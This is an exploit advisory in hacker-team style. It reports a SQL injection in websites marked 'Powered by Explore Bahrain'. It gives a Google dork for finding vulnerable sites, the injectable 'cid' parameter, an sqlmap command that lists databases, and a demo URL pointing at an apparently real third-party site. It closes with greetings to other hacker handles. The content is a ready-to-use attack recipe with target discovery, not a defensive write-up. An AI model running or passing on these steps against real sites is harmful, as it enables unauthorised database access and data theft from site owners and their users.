|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: SQL Injection Vulnerability [ Powered by Explore Bahrain ] |[+] |[+] Exploit Author: 1337r00t |[+] |[+] Exploit Team Author: T34m D4rkn3ss R00m |[+] |[+] Vendor Homepage: www.explorebahrain.com |[+] |[+] Google Dork: intext:Powered by Explore Bahrain " inurl:?cid= |[+] |[+] Tested on: Mozilla Firefox , SQLMAP |[+] |[+] Date: 31/7/2016 |[+] |--------------------------------------------------------------| |[+] Exploit :- |[+] |[+] http://[$Site].php?cid=[SQL] |[+]-----------------------------------------------------------| |[+] p0c :- |[+] |[+] Open SQLMAP :- |[+] ./sqlmap.py -u http://[$Site]products.php?cid=[SQL] --dbs --batch |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+] http://www.arepro.bh/products.php?cid=6' |[+] |--------------------------------------------------------------| |[+] My Accounts :- |[+] |[+] Twitter:1337r00t |[+] Instagram: 1337r00t |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+]-------------------------------------------[+] |[+] G2 : Killer~X - 3NeeDaN HacKeR - Saudi HeX - Lion Hacker - Ev!L r00t - BaRQawI - LaTh3 - BL4ck M4n - Safaa Hacker |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : 1337r00t |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|